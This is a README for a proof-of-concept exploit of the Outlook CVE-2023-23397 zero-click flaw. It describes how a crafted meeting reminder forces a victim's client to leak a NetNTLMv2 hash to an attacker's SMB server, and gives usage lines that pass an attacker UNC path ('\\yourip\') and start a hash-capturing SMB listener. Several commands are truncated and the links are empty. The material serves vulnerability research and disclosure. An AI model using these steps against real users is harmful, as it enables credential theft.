# CVE-2023-23397

Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client. 

## Description

Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).

An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox.

## What does the poc do?

1. Generated `.msg` payload.
2. Send it by email with custom SMTP server.

## Usage

In one session :


usage: [-h] -p PATH error: the following arguments are required: -p/--path

python --path '\\yourip\'

In a second session (`smbserver` or `responder` as you want).

``` -smb2support SHARE .

## Demo (manual poc)


## Explanatory video (french speaking)

[![RÉCUPÉRER des mots de passe avec Microsoft OUTLOOK #CVE-2023-23397](](

## Original article